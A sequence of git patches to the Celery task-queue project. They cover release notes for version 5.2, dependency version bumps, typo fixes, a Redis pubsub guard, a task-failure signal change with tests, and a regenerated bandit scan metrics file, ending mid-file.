+Prefork Workers Pool
+---------------------
+
+Now all orphaned worker processes are killed automatically when main process exits.
+
+Eventlet Workers Pool
+---------------------
+
+You can now terminate running revoked tasks while using the
+Eventlet Workers Pool.
+
+Custom Task Classes
+-------------------
+
+We introduced a custom handler which will be executed before the task
+is started called ``before_start``.
+
+See :ref:`custom-task-cls-app-wide` for more details.
+
+Important Notes From 5.0
+------------------------
+
+Dropped support for Python 2.7 & 3.5
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Celery now requires Python 3.6 and above.
+
+Python 2.7 has reached EOL in January 2020.
+In order to focus our efforts we have dropped support for Python 2.7 in
+this version.
+
+In addition, Python 3.5 has reached EOL in September 2020.
+Therefore, we are also dropping support for Python 3.5.
+
+If you still require to run Celery using Python 2.7 or Python 3.5
+you can still use Celery 4.x.
+However we encourage you to upgrade to a supported Python version since
+no further security patches will be applied for Python 2.7 or
+Python 3.5.
+
+Eventlet Workers Pool
+~~~~~~~~~~~~~~~~~~~~~
+
+Due to `eventlet/eventlet#526 `_
+the minimum required version is eventlet 0.26.1.
+
+Gevent Workers Pool
+~~~~~~~~~~~~~~~~~~~
+
+Starting from v5.0, the minimum required version is gevent 1.0.0.
+
+Couchbase Result Backend
+~~~~~~~~~~~~~~~~~~~~~~~~
+
+The Couchbase result backend now uses the V3 Couchbase SDK.
+
+As a result, we no longer support Couchbase Server 5.x.
+
+Also, starting from v5.0, the minimum required version
+for the database client is couchbase 3.0.0.
+
+To verify that your Couchbase Server is compatible with the V3 SDK,
+please refer to their `documentation `_.
+
+Riak Result Backend
+~~~~~~~~~~~~~~~~~~~
+
+The Riak result backend has been removed as the database is no longer maintained.
+
+The Python client only supports Python 3.6 and below which prevents us from
+supporting it and it is also unmaintained.
+
+If you are still using Riak, refrain from upgrading to Celery 5.0 while you
+migrate your application to a different database.
+
+We apologize for the lack of notice in advance but we feel that the chance
+you'll be affected by this breaking change is minimal which is why we
+did it.
+
+AMQP Result Backend
+~~~~~~~~~~~~~~~~~~~
+
+The AMQP result backend has been removed as it was deprecated in version 4.0.
+
+Removed Deprecated Modules
+~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+The `celery.utils.encoding` and the `celery.task` modules has been deprecated
+in version 4.0 and therefore are removed in 5.0.
+
+If you were using the `celery.utils.encoding` module before,
+you should import `kombu.utils.encoding` instead.
+
+If you were using the `celery.task` module before, you should import directly
+from the `celery` module instead.
+
+`azure-servicebus` 7.0.0 is now required
+----------------------------------------
+
+Given the SDK changes between 0.50.0 and 7.0.0 Kombu deprecates support for
+older `azure-servicebus` versions.
+
+.. _v520-news:
+
+News
+====
+
+Support for invoking chords of unregistered tasks
+-------------------------------------------------
+
+Previously if you attempted to publish a chord
+while providing a signature which wasn't registered in the Celery app publishing
+the chord as the body of the chord, an :exc:`celery.exceptions.NotRegistered`
+exception would be raised.
+
+From now on, you can publish these sort of chords and they would be executed
+correctly:
+
+.. code-block:: python
+
+ # movies.task.publish_movie is registered in the current app
+ movie_task = celery_app.signature('movies.task.publish_movie', task_id=str(uuid.uuid4()), immutable=True)
+ # news.task.publish_news is *not* registered in the current app
+ news_task = celery_app.signature('news.task.publish_news', task_id=str(uuid.uuid4()), immutable=True)
+
+ my_chord = chain(movie_task,
+ group(movie_task.set(task_id=str(uuid.uuid4())),
+ movie_task.set(task_id=str(uuid.uuid4()))),
+ news_task)
+ my_chord.apply_async() # <-- No longer raises an exception
+
+Consul Result Backend
+---------------------
+
+We now create a new client per request to Consul to avoid a bug in the Consul
+client.
+
+The Consul Result Backend now accepts a new
+:setting:`result_backend_transport_options` key: ``one_client``.
+You can opt out of this behavior by setting ``one_client`` to True.
+
+Please refer to the documentation of the backend if you're using the Consul
+backend to find out which behavior suites you.
+
+Filesystem Result Backend
+-------------------------
+
+We now cleanup expired task results while using the
+filesystem result backend as most result backends do.
+
+ArangoDB Result Backend
+-----------------------
+
+You can now check the validity of the CA certificate while making
+a TLS connection to ArangoDB result backend.
+
+If you'd like to do so, set the ``verify`` key in the
+:setting:`arangodb_backend_settings`` dictionary to ``True``.
From 87a7ef762736a6f9680aa34d500a577920696cb0 Mon Sep 17 00:00:00 2001
From: Naomi Elstein
Date: Tue, 2 Nov 2021 18:40:59 +0200
Subject: [PATCH 104/177] Bump kombu to version 5.2.0
---
requirements/default.txt | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/requirements/default.txt b/requirements/default.txt
index 6d28411082d..ba82765ab85 100644
--- a/requirements/default.txt
+++ b/requirements/default.txt
@@ -1,6 +1,6 @@
pytz>dev
billiard>=3.6.4.0,<4.0
-kombu>=5.2.0rc1,<6.0
+kombu>=5.2.0,<6.0
vine>=5.0.0,<6.0
click>=8.0,<9.0
click-didyoumean>=0.0.3
From 5d68d781de807b4576cf5f574e5ba0aaf0d17388 Mon Sep 17 00:00:00 2001
From: "Kian-Meng, Ang"
Date: Sat, 30 Oct 2021 07:12:22 +0800
Subject: [PATCH 105/177] Fix typos
---
celery/app/autoretry.py | 2 +-
celery/concurrency/asynpool.py | 4 ++--
celery/contrib/pytest.py | 2 +-
celery/loaders/base.py | 2 +-
celery/utils/functional.py | 2 +-
celery/utils/text.py | 4 ++--
celery/utils/threads.py | 2 +-
docker/Dockerfile | 2 +-
docs/history/changelog-4.4.rst | 2 +-
docs/history/whatsnew-3.0.rst | 2 +-
docs/history/whatsnew-4.4.rst | 2 +-
extra/generic-init.d/celerybeat | 2 +-
t/unit/backends/test_redis.py | 2 +-
t/unit/tasks/test_canvas.py | 2 +-
t/unit/utils/test_collections.py | 2 +-
t/unit/worker/test_worker.py | 2 +-
16 files changed, 18 insertions(+), 18 deletions(-)
diff --git a/celery/app/autoretry.py b/celery/app/autoretry.py
index a22b9f04717..a5fe700b650 100644
--- a/celery/app/autoretry.py
+++ b/celery/app/autoretry.py
@@ -33,7 +33,7 @@ def run(*args, **kwargs):
try:
return task._orig_run(*args, **kwargs)
except Ignore:
- # If Ignore signal occures task shouldn't be retried,
+ # If Ignore signal occurs task shouldn't be retried,
# even if it suits autoretry_for list
raise
except Retry:
diff --git a/celery/concurrency/asynpool.py b/celery/concurrency/asynpool.py
index 0c16187823b..d5d2bdb5124 100644
--- a/celery/concurrency/asynpool.py
+++ b/celery/concurrency/asynpool.py
@@ -1068,7 +1068,7 @@ def get_process_queues(self):
if owner is None)
def on_grow(self, n):
- """Grow the pool by ``n`` proceses."""
+ """Grow the pool by ``n`` processes."""
diff = max(self._processes - len(self._queues), 0)
if diff:
self._queues.update({
@@ -1248,7 +1248,7 @@ def on_partial_read(self, job, proc):
"""Called when a job was partially written to exited child."""
# worker terminated by signal:
# we cannot reuse the sockets again, because we don't know if
- # the process wrote/read anything frmo them, and if so we cannot
+ # the process wrote/read anything from them, and if so we cannot
# restore the message boundaries.
if not job._accepted:
# job was not acked, so find another worker to send it to.
diff --git a/celery/contrib/pytest.py b/celery/contrib/pytest.py
index f44a828ecaa..858e4e5c447 100644
--- a/celery/contrib/pytest.py
+++ b/celery/contrib/pytest.py
@@ -22,7 +22,7 @@
def pytest_configure(config):
"""Register additional pytest configuration."""
# add the pytest.mark.celery() marker registration to the pytest.ini [markers] section
- # this prevents pytest 4.5 and newer from issueing a warning about an unknown marker
+ # this prevents pytest 4.5 and newer from issuing a warning about an unknown marker
# and shows helpful marker documentation when running pytest --markers.
config.addinivalue_line(
"markers", "celery(**overrides): override celery configuration for a test case"
diff --git a/celery/loaders/base.py b/celery/loaders/base.py
index 8cc15de8f8a..17f165d7c03 100644
--- a/celery/loaders/base.py
+++ b/celery/loaders/base.py
@@ -251,7 +251,7 @@ def autodiscover_tasks(packages, related_name='tasks'):
def find_related_module(package, related_name):
"""Find module in package."""
- # Django 1.7 allows for speciying a class name in INSTALLED_APPS.
+ # Django 1.7 allows for specifying a class name in INSTALLED_APPS.
# (Issue #2248).
try:
module = importlib.import_module(package)
diff --git a/celery/utils/functional.py b/celery/utils/functional.py
index 2878bc15ea0..e8a8453cc6e 100644
--- a/celery/utils/functional.py
+++ b/celery/utils/functional.py
@@ -1,4 +1,4 @@
-"""Functional-style utilties."""
+"""Functional-style utilities."""
import inspect
import sys
from collections import UserList
diff --git a/celery/utils/text.py b/celery/utils/text.py
index 661a02fc002..8f4a321eebb 100644
--- a/celery/utils/text.py
+++ b/celery/utils/text.py
@@ -33,13 +33,13 @@ def str_to_list(s):
def dedent_initial(s, n=4):
# type: (str, int) -> str
- """Remove identation from first line of text."""
+ """Remove indentation from first line of text."""
return s[n:] if s[:n] == ' ' * n else s
def dedent(s, n=4, sep='\n'):
# type: (str, int, str) -> str
- """Remove identation."""
+ """Remove indentation."""
return sep.join(dedent_initial(l) for l in s.splitlines())
diff --git a/celery/utils/threads.py b/celery/utils/threads.py
index a80b9ed69cf..94c6f617c40 100644
--- a/celery/utils/threads.py
+++ b/celery/utils/threads.py
@@ -282,7 +282,7 @@ def __init__(self, locals=None, ident_func=None):
def get_ident(self):
"""Return context identifier.
- This is the indentifer the local objects use internally
+ This is the identifier the local objects use internally
for this context. You cannot override this method to change the
behavior but use it to link other context local objects (such as
SQLAlchemy's scoped sessions) to the Werkzeug locals.
diff --git a/docker/Dockerfile b/docker/Dockerfile
index 7f91b01cc59..0cd557070d0 100644
--- a/docker/Dockerfile
+++ b/docker/Dockerfile
@@ -47,7 +47,7 @@ ENV PATH="$HOME/.pyenv/bin:$PATH"
# Copy and run setup scripts
WORKDIR $PROVISIONING
#COPY docker/scripts/install-couchbase.sh .
-# Scripts will lose thier executable flags on copy. To avoid the extra instructions
+# Scripts will lose their executable flags on copy. To avoid the extra instructions
# we call the shell directly.
#RUN sh install-couchbase.sh
COPY docker/scripts/create-linux-user.sh .
diff --git a/docs/history/changelog-4.4.rst b/docs/history/changelog-4.4.rst
index 506672c4f0a..e6a851676cd 100644
--- a/docs/history/changelog-4.4.rst
+++ b/docs/history/changelog-4.4.rst
@@ -25,7 +25,7 @@ an overview of what's new in Celery 4.4.
- Fix REMAP_SIGTERM=SIGQUIT not working
- (Fixes#6258) MongoDB: fix for serialization issue (#6259)
- Make use of ordered sets in Redis opt-in
-- Test, CI, Docker & style and minor doc impovements.
+- Test, CI, Docker & style and minor doc improvements.
4.4.6
=======
diff --git a/docs/history/whatsnew-3.0.rst b/docs/history/whatsnew-3.0.rst
index 3b06ab91d14..7abd3229bac 100644
--- a/docs/history/whatsnew-3.0.rst
+++ b/docs/history/whatsnew-3.0.rst
@@ -524,7 +524,7 @@ stable and is now documented as part of the official API.
.. code-block:: pycon
>>> celery.control.pool_grow(2, destination=['w1.example.com'])
- >>> celery.contorl.pool_shrink(2, destination=['w1.example.com'])
+ >>> celery.control.pool_shrink(2, destination=['w1.example.com'])
or using the :program:`celery control` command:
diff --git a/docs/history/whatsnew-4.4.rst b/docs/history/whatsnew-4.4.rst
index 1f252de30a5..24b4ac61b3b 100644
--- a/docs/history/whatsnew-4.4.rst
+++ b/docs/history/whatsnew-4.4.rst
@@ -51,7 +51,7 @@ This release has been codenamed `Cliffs
Date: Sun, 31 Oct 2021 17:57:04 +0600
Subject: [PATCH 106/177] python 3 shell for testing CI
---
setup.py | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/setup.py b/setup.py
index fa3369b92be..6b41a8a71a6 100755
--- a/setup.py
+++ b/setup.py
@@ -1,4 +1,4 @@
-#!/usr/bin/env python
+#!/usr/bin/env python3
import codecs
import os
import re
From 013b0e988f9141f5135baa8c7c6d30aa575779da Mon Sep 17 00:00:00 2001
From: Naomi Elstein
Date: Thu, 4 Nov 2021 12:22:55 +0200
Subject: [PATCH 107/177] Limit pymongo version: <3.12.1 (#7041)
---
requirements/extras/mongodb.txt | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/requirements/extras/mongodb.txt b/requirements/extras/mongodb.txt
index b3e1256564f..7ad511e68c5 100644
--- a/requirements/extras/mongodb.txt
+++ b/requirements/extras/mongodb.txt
@@ -1 +1 @@
-pymongo[srv]>=3.3.0
+pymongo[srv]>=3.3.0,<3.12.1
From e5d99801e4b56a02af4a2e183879c767228d2817 Mon Sep 17 00:00:00 2001
From: Wei Wei <49308161+Androidown@users.noreply.github.com>
Date: Thu, 4 Nov 2021 22:54:04 +0800
Subject: [PATCH 108/177] Prevent from subscribing to empty channels (#7040)
* Prevent from subscribing to emtpy channels
* add unit test for pr.
Co-authored-by: weiwei
---
celery/backends/redis.py | 3 ++-
t/unit/backends/test_redis.py | 9 +++++++++
2 files changed, 11 insertions(+), 1 deletion(-)
diff --git a/celery/backends/redis.py b/celery/backends/redis.py
index e4a4cc104e7..7eedc4c089b 100644
--- a/celery/backends/redis.py
+++ b/celery/backends/redis.py
@@ -110,7 +110,8 @@ def _reconnect_pubsub(self):
self._pubsub = self.backend.client.pubsub(
ignore_subscribe_messages=True,
)
- self._pubsub.subscribe(*self.subscribed_to)
+ if self.subscribed_to:
+ self._pubsub.subscribe(*self.subscribed_to)
@contextmanager
def reconnect_on_error(self):
diff --git a/t/unit/backends/test_redis.py b/t/unit/backends/test_redis.py
index f93fcd160d4..13dcf2eee9a 100644
--- a/t/unit/backends/test_redis.py
+++ b/t/unit/backends/test_redis.py
@@ -276,6 +276,15 @@ def test_drain_events_connection_error(self, parent_on_state_change, cancel_for)
parent_on_state_change.assert_called_with(meta, None)
assert consumer._pubsub._subscribed_to == {b'celery-task-meta-initial'}
+ def test_drain_events_connection_error_no_patch(self):
+ meta = {'task_id': 'initial', 'status': states.SUCCESS}
+ consumer = self.get_consumer()
+ consumer.start('initial')
+ consumer.backend._set_with_state(b'celery-task-meta-initial', json.dumps(meta), states.SUCCESS)
+ consumer._pubsub.get_message.side_effect = ConnectionError()
+ consumer.drain_events()
+ consumer._pubsub.subscribe.assert_not_called()
+
class basetest_RedisBackend:
def get_backend(self):
From 3bbf8c8918ee892432bbae5973de5b7e10515eaf Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Fri, 5 Nov 2021 14:24:04 +0600
Subject: [PATCH 109/177] try new latest version 12.9.0 (#7042)
---
requirements/extras/azureblockblob.txt | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/requirements/extras/azureblockblob.txt b/requirements/extras/azureblockblob.txt
index e533edb7e76..a9208b97325 100644
--- a/requirements/extras/azureblockblob.txt
+++ b/requirements/extras/azureblockblob.txt
@@ -1 +1 @@
-azure-storage-blob==12.6.0
+azure-storage-blob==12.9.0
From c66e8c4a30fe8ace600d378b65c0f3577ee645ff Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Sat, 6 Nov 2021 19:54:21 +0600
Subject: [PATCH 110/177] update to new django settings (#7044)
---
examples/celery_http_gateway/settings.py | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/examples/celery_http_gateway/settings.py b/examples/celery_http_gateway/settings.py
index a671b980e49..d8001673c90 100644
--- a/examples/celery_http_gateway/settings.py
+++ b/examples/celery_http_gateway/settings.py
@@ -75,11 +75,11 @@
'django.template.loaders.app_directories.load_template_source',
)
-MIDDLEWARE_CLASSES = (
+MIDDLEWARE = [
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
-)
+]
ROOT_URLCONF = 'celery_http_gateway.urls'
From 37481fdd57a1ec036695a86d8f3d5e36f9ecf84c Mon Sep 17 00:00:00 2001
From: ninlei
Date: Fri, 5 Nov 2021 20:30:21 +0800
Subject: [PATCH 111/177] fix register_task method
fix cannot pass parameters to add_autoretry_behaviour when call register_task method
---
celery/app/base.py | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/celery/app/base.py b/celery/app/base.py
index a00d4651336..0b893fddb87 100644
--- a/celery/app/base.py
+++ b/celery/app/base.py
@@ -492,7 +492,7 @@ def _task_from_fun(self, fun, name=None, base=None, bind=False, **options):
task = self._tasks[name]
return task
- def register_task(self, task):
+ def register_task(self, task, **options):
"""Utility for registering a task-based class.
Note:
@@ -505,7 +505,7 @@ def register_task(self, task):
task_cls = type(task)
task.name = self.gen_task_name(
task_cls.__name__, task_cls.__module__)
- add_autoretry_behaviour(task)
+ add_autoretry_behaviour(task, **options)
self.tasks[task.name] = task
task._app = self
task.bind(self)
From ef77fcd2ac872275cdd0f85e21180fe7b6433125 Mon Sep 17 00:00:00 2001
From: Naomi Elstein
Date: Sun, 7 Nov 2021 16:24:13 +0200
Subject: [PATCH 112/177] Add pymongo issue to "What's new in Celery 5.2"
(#7051)
* Add pymongo issue to "What's new in Celery 5.2"
* Update whatsnew-5.2.rst
* Update whatsnew-5.2.rst
---
docs/whatsnew-5.2.rst | 7 +++++++
1 file changed, 7 insertions(+)
diff --git a/docs/whatsnew-5.2.rst b/docs/whatsnew-5.2.rst
index f1f60743cf8..1180a653c63 100644
--- a/docs/whatsnew-5.2.rst
+++ b/docs/whatsnew-5.2.rst
@@ -330,6 +330,13 @@ older `azure-servicebus` versions.
.. _v520-news:
+Bug: Pymongo 3.12.1 is not compatible with Celery 5.2
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+For now we are limiting Pymongo version, only allowing for versions between 3.3.0 and 3.12.0.
+
+This will be fixed in the next patch.
+
News
====
From 54862310a929fa1543b4ae4e89694905015a1216 Mon Sep 17 00:00:00 2001
From: Omer Katz
Date: Mon, 8 Nov 2021 02:36:34 +0200
Subject: [PATCH 113/177] Fire task failure signal on final reject (#6980)
* Improve Request.on_failure() unit tests.
* Fire the task_failure signal when task is not going to be requeued.
---
celery/worker/request.py | 6 ++++
t/unit/worker/test_request.py | 53 ++++++++++++++++++++++++++++++-----
2 files changed, 52 insertions(+), 7 deletions(-)
diff --git a/celery/worker/request.py b/celery/worker/request.py
index 0b29bde65bb..fb6d60e6812 100644
--- a/celery/worker/request.py
+++ b/celery/worker/request.py
@@ -579,6 +579,12 @@ def on_failure(self, exc_info, send_failed_event=True, return_ok=False):
store_result=self.store_errors,
)
+ signals.task_failure.send(sender=self.task, task_id=self.id,
+ exception=exc, args=self.args,
+ kwargs=self.kwargs,
+ traceback=exc_info.traceback,
+ einfo=exc_info)
+
if send_failed_event:
self.send_event(
'task-failed',
diff --git a/t/unit/worker/test_request.py b/t/unit/worker/test_request.py
index eb173a1c987..2c49f777103 100644
--- a/t/unit/worker/test_request.py
+++ b/t/unit/worker/test_request.py
@@ -19,7 +19,7 @@
from celery.backends.base import BaseDictBackend
from celery.exceptions import (Ignore, InvalidTaskError, Reject, Retry,
TaskRevokedError, Terminated, WorkerLostError)
-from celery.signals import task_retry, task_revoked
+from celery.signals import task_failure, task_retry, task_revoked
from celery.worker import request as module
from celery.worker import strategy
from celery.worker.request import Request, create_request_cls
@@ -171,7 +171,6 @@ def ignores_result(i):
assert not self.app.AsyncResult(task_id).ready()
def test_execute_request_ignore_result(self):
-
@self.app.task(shared=False)
def ignores_result(i):
return i ** i
@@ -232,7 +231,8 @@ def test_info_function(self):
kwargs[str(i)] = ''.join(
random.choice(string.ascii_lowercase) for i in range(1000))
assert self.get_request(
- self.add.s(**kwargs)).info(safe=True).get('kwargs') == '' # mock message doesn't populate kwargsrepr
+ self.add.s(**kwargs)).info(safe=True).get(
+ 'kwargs') == '' # mock message doesn't populate kwargsrepr
assert self.get_request(
self.add.s(**kwargs)).info(safe=False).get('kwargs') == kwargs
args = []
@@ -240,7 +240,8 @@ def test_info_function(self):
args.append(''.join(
random.choice(string.ascii_lowercase) for i in range(1000)))
assert list(self.get_request(
- self.add.s(*args)).info(safe=True).get('args')) == [] # mock message doesn't populate argsrepr
+ self.add.s(*args)).info(safe=True).get(
+ 'args')) == [] # mock message doesn't populate argsrepr
assert list(self.get_request(
self.add.s(*args)).info(safe=False).get('args')) == args
@@ -336,32 +337,69 @@ def test_on_failure_Reject_rejects_with_requeue(self):
)
def test_on_failure_WorkerLostError_rejects_with_requeue(self):
- einfo = None
try:
raise WorkerLostError()
except WorkerLostError:
einfo = ExceptionInfo(internal=True)
+
req = self.get_request(self.add.s(2, 2))
req.task.acks_late = True
req.task.reject_on_worker_lost = True
req.delivery_info['redelivered'] = False
+ req.task.backend = Mock()
+
req.on_failure(einfo)
+
req.on_reject.assert_called_with(
req_logger, req.connection_errors, True)
+ req.task.backend.mark_as_failure.assert_not_called()
def test_on_failure_WorkerLostError_redelivered_None(self):
- einfo = None
try:
raise WorkerLostError()
except WorkerLostError:
einfo = ExceptionInfo(internal=True)
+
req = self.get_request(self.add.s(2, 2))
req.task.acks_late = True
req.task.reject_on_worker_lost = True
req.delivery_info['redelivered'] = None
+ req.task.backend = Mock()
+
req.on_failure(einfo)
+
req.on_reject.assert_called_with(
req_logger, req.connection_errors, True)
+ req.task.backend.mark_as_failure.assert_not_called()
+
+ def test_on_failure_WorkerLostError_redelivered_True(self):
+ try:
+ raise WorkerLostError()
+ except WorkerLostError:
+ einfo = ExceptionInfo(internal=True)
+
+ req = self.get_request(self.add.s(2, 2))
+ req.task.acks_late = False
+ req.task.reject_on_worker_lost = True
+ req.delivery_info['redelivered'] = True
+ req.task.backend = Mock()
+
+ with self.assert_signal_called(
+ task_failure,
+ sender=req.task,
+ task_id=req.id,
+ exception=einfo.exception,
+ args=req.args,
+ kwargs=req.kwargs,
+ traceback=einfo.traceback,
+ einfo=einfo
+ ):
+ req.on_failure(einfo)
+
+ req.task.backend.mark_as_failure.assert_called_once_with(req.id,
+ einfo.exception,
+ request=req._context,
+ store_result=True)
def test_tzlocal_is_cached(self):
req = self.get_request(self.add.s(2, 2))
@@ -1292,7 +1330,8 @@ def test_execute_using_pool_with_none_timelimit_header(self):
def test_execute_using_pool__defaults_of_hybrid_to_proto2(self):
weakref_ref = Mock(name='weakref.ref')
headers = strategy.hybrid_to_proto2(Mock(headers=None), {'id': uuid(),
- 'task': self.mytask.name})[1]
+ 'task': self.mytask.name})[
+ 1]
job = self.zRequest(revoked_tasks=set(), ref=weakref_ref, **headers)
job.execute_using_pool(self.pool)
assert job._apply_result
From 8de7f1430299dd3dbb6a7ea2afef45585a679c09 Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Mon, 8 Nov 2021 06:37:50 +0600
Subject: [PATCH 114/177] update kombu to 5.2.1 (#7053)
---
requirements/default.txt | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/requirements/default.txt b/requirements/default.txt
index ba82765ab85..c9110a53ef6 100644
--- a/requirements/default.txt
+++ b/requirements/default.txt
@@ -1,6 +1,6 @@
pytz>dev
billiard>=3.6.4.0,<4.0
-kombu>=5.2.0,<6.0
+kombu>=5.2.1,<6.0
vine>=5.0.0,<6.0
click>=8.0,<9.0
click-didyoumean>=0.0.3
From 6138d6060f17eef27ce0c90d3bf18f305ace97c6 Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Mon, 8 Nov 2021 06:45:29 +0600
Subject: [PATCH 115/177] update kombu
---
setup.cfg | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/setup.cfg b/setup.cfg
index 53909275c13..daa92865f7f 100644
--- a/setup.cfg
+++ b/setup.cfg
@@ -31,7 +31,7 @@ per-file-ignores =
[bdist_rpm]
requires = pytz >= 2016.7
billiard >= 3.6.3.0,<4.0
- kombu >= 5.2.0rc1,<6.0.0
+ kombu >= 5.2.1,<6.0.0
[bdist_wheel]
universal = 0
From fb95cf0d0aa2412f0130a303ab2c58091334cebc Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Mon, 8 Nov 2021 07:02:06 +0600
Subject: [PATCH 116/177] update banit
---
bandit.json | 466 ++++++++++++++++++++++++----------------------------
1 file changed, 213 insertions(+), 253 deletions(-)
diff --git a/bandit.json b/bandit.json
index 95a9201f312..fa207a9c734 100644
--- a/bandit.json
+++ b/bandit.json
@@ -1,17 +1,17 @@
{
"errors": [],
- "generated_at": "2020-08-06T14:09:58Z",
+ "generated_at": "2021-11-08T00:55:15Z",
"metrics": {
"_totals": {
- "CONFIDENCE.HIGH": 38.0,
+ "CONFIDENCE.HIGH": 40.0,
"CONFIDENCE.LOW": 0.0,
"CONFIDENCE.MEDIUM": 2.0,
"CONFIDENCE.UNDEFINED": 0.0,
"SEVERITY.HIGH": 0.0,
- "SEVERITY.LOW": 38.0,
+ "SEVERITY.LOW": 40.0,
"SEVERITY.MEDIUM": 2.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 29309,
+ "loc": 29546,
"nosec": 0
},
"celery/__init__.py": {
@@ -23,7 +23,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 129,
+ "loc": 126,
"nosec": 0
},
"celery/__main__.py": {
@@ -35,7 +35,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 9,
+ "loc": 12,
"nosec": 0
},
"celery/_state.py": {
@@ -71,7 +71,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 528,
+ "loc": 503,
"nosec": 0
},
"celery/app/annotations.py": {
@@ -95,7 +95,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 43,
+ "loc": 50,
"nosec": 0
},
"celery/app/backends.py": {
@@ -119,7 +119,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 964,
+ "loc": 1028,
"nosec": 0
},
"celery/app/builtins.py": {
@@ -143,7 +143,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 383,
+ "loc": 607,
"nosec": 0
},
"celery/app/defaults.py": {
@@ -155,7 +155,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 365,
+ "loc": 361,
"nosec": 0
},
"celery/app/events.py": {
@@ -179,7 +179,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 197,
+ "loc": 198,
"nosec": 0
},
"celery/app/registry.py": {
@@ -203,7 +203,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 110,
+ "loc": 107,
"nosec": 0
},
"celery/app/task.py": {
@@ -215,7 +215,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 740,
+ "loc": 779,
"nosec": 0
},
"celery/app/trace.py": {
@@ -227,7 +227,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 535,
+ "loc": 560,
"nosec": 0
},
"celery/app/utils.py": {
@@ -239,7 +239,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 300,
+ "loc": 315,
"nosec": 0
},
"celery/apps/__init__.py": {
@@ -275,7 +275,7 @@
"SEVERITY.LOW": 2.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 409,
+ "loc": 426,
"nosec": 0
},
"celery/apps/worker.py": {
@@ -287,7 +287,7 @@
"SEVERITY.LOW": 1.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 291,
+ "loc": 304,
"nosec": 0
},
"celery/backends/__init__.py": {
@@ -299,19 +299,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 17,
- "nosec": 0
- },
- "celery/backends/amqp.py": {
- "CONFIDENCE.HIGH": 0.0,
- "CONFIDENCE.LOW": 0.0,
- "CONFIDENCE.MEDIUM": 0.0,
- "CONFIDENCE.UNDEFINED": 0.0,
- "SEVERITY.HIGH": 0.0,
- "SEVERITY.LOW": 0.0,
- "SEVERITY.MEDIUM": 0.0,
- "SEVERITY.UNDEFINED": 0.0,
- "loc": 265,
+ "loc": 1,
"nosec": 0
},
"celery/backends/arangodb.py": {
@@ -323,7 +311,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 199,
+ "loc": 201,
"nosec": 0
},
"celery/backends/asynchronous.py": {
@@ -347,7 +335,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 107,
+ "loc": 126,
"nosec": 0
},
"celery/backends/base.py": {
@@ -359,7 +347,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 773,
+ "loc": 809,
"nosec": 0
},
"celery/backends/cache.py": {
@@ -371,7 +359,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 117,
+ "loc": 118,
"nosec": 0
},
"celery/backends/cassandra.py": {
@@ -383,7 +371,7 @@
"SEVERITY.LOW": 0.0,
"SEVERITY.MEDIUM": 0.0,
"SEVERITY.UNDEFINED": 0.0,
- "loc": 178,
+ "loc": 174,
"nosec": 0
},
"celery/backends/consul.py": {
@@ -395,7 +383,7 @@
